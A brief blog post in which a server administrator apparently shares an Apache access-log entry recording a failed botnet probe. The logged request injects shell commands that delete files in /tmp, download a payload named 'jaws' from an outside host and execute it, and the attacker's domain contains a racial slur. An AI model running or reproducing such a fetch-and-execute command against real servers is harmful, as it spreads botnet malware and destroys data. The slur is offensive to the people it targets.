Script Kiddy of the Day

I saw this humorous attempt in the apache logs this morning:


==> /var/log/httpd/access_log <== 36.233.72.178 - 127.0.0.1:80 - [13/Feb/2020:07:08:44 -0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 203 "-" "Hello, world"

Interesting domain, as always. Typical style for botnet controllers.

Leave a Reply

Your email address will not be published. Required fields are marked *